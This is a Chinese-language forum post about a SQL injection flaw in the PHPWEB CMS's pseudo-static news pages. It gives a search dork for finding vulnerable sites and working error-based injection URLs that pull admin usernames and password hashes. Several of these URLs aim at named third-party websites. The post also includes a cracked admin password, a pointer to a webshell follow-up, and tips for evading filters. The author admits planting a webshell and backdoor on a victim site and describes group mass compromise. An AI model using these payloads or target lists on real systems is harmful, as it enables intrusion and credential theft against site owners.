PHPWEB V2.0.5(20120412)伪静态注入漏洞

发布日期：2013-01.16
发布作者：YoCo Smart

漏洞类型：SQL注入

漏洞描述：可以以inurl:/news/html/?411.html为关键字搜索
漏洞版本：我测试的是V2.0.5(20120412)
官方演示站V2.0.15(20121030)也有这个漏洞，自己猜一下吧

我直接贴EXP语句吧：

http://www.yunsec.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

解密得到管理员密码是：yangfeng

后台取webshell可以看这篇文章，有一个精简过得6行EXP代码可以直接用。
http://bbs.blackbap.org/thread-2281-1-1.html

需要注意的是，这个伪静态的注入和URL的普通GET注入不太相同
普通url的get注入，%20,%23,+等等，都可以用，但是这里不行，会被直接传递到到url中，所以用/**/这个注释符号是再好不过的了
有很多浏览器会本地转义单引号'为%27等，注意一下，设置浏览器不要自动转义

由于又粗线了删Webshell的密码狗，把我得Webshell和后门都删了，还挂了首页，漏洞文件也删了，在下提供的演示网址已经作废。。。不过用phpweb的还是很多的

习科的QQ讨论群已经开始批量轮站了，这种情况是我没有料到的 - -!

送一个三群给的：

http://www.gdhy888.com/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

http://www.opg-dianji.com/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

phpweb官方演示站：
.http://demo.6888.net/4341_6400/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(user,0x3a,password)/**/from/**/dev_base_admin/**/limit/**/0,1))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html